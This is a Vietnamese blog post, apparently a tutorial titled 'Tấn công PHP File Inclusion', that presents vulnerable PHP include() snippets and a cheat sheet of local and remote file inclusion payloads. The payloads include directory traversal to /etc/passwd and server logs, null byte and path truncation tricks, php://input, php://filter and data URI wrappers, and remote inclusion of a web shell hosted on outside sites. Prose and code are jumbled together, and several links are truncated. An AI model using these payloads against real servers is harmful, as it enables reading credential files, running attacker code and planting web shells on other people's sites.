Thấy có người thắc mắc về vụ File inclusion này,mình sẽ lập 1 topic để giải đáp mọi vấn đề
Local File Inclusion Basic Level:
ví dụ trong trường hợp code như sau
Code:Chúng ta sẽ có thể :<?php include("includes/" . $_GET['file']); ?>
Including files cùng thư mục:Local File Inclusion Nâng cao:?file=.htaccess
Xem Path:
?file=../../../../../../../../../var/lib/locate.db
(this file is very interesting because it lets you search the filesystem, other files)
Including injected PHP code: có thể vào error.log,ssh auth.log,session file,...
?file=../../../../../../../../../var/log/apache/error.log
ví dụ đoạn code thế này
Code:CHúng ta sẽ dùng<?php include("includes/" . $_GET['file'] . ".htm"); ?>
Null Byte Injection:(yêu cầu magic_quotes_gpc=off)?file=../../../../../../../../../etc/passwd
Xem thư mục với Null Byte Injection:(UFS filesystem,magic_quotes_gpc=off)?file=../../../../../../../../../var/www/accounts/
Path Truncation:Xem thêm cái path truncation tại?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
http://www.ush.it/2009/02/08/php-fil...ttack-vectors/
Dot Truncation:(Windows)?file=../../../../../../../../../etc/passwd……………. …
Reverse Path Truncation:Giờ tiến hành nói đến Remote File Inclusion Cơ bản?file=../../../../ [...] ../../../../../etc/passwd
Ví dụ
Code:chúng ta có thể :<?php include($_GET['file']); ?>
Including Remote Code:(requires allow_url_fopen=On ,allow_url_include=On)?file=http://sodvn.org/tools/shell.txt (https hoặc ftp)
Sử dụng PHP stream php://input:(chỉ dùng cho POST parameters, allow_url_include=On)?file=php://input
Using PHP stream php://filter:(cái này k cần bật magic_quote vẫn ok)?file=php://filter/convert.base64-encode/resource=hehe.php
Sử dụng data URIs:(requires allow_url_include=On)?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
Sử dụng XSS: (cái này hay)(tuy nhiên bị hạn chế bở firewall)?file=http://127.0.0.1/path/xss.php?xss=phpcode
Remote File Inclusion thể loại khác:
ví dụ :
Code:thì<?php include($_GET['file'] . ".htm"); ?>1 số tài liệu tham khảo thêm?file=http://test.com/shell
?file=http://test.com/shell.txt?
?file=http://test.com/shell.txt%23 (allow_url_fopen=On, allow_url_include=On)'
The POST DATA method
http://blog.php-security.org/archive...l_include.html
PHP Protocol Wrappers documentation
http://www.php.net/manual/en/wrappers.php.php
PHP Filter documentation
http://www.php.net/manual/en/filters.convert.php
added code exec via ssh auth.log http://www.coresec.org/2011/05/12/lo...Assistance.pdf
Bài kế tiếp sẽ nói cách bảo vệ
Tấn công PHP File Inclusion
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào:
Đăng nhận xét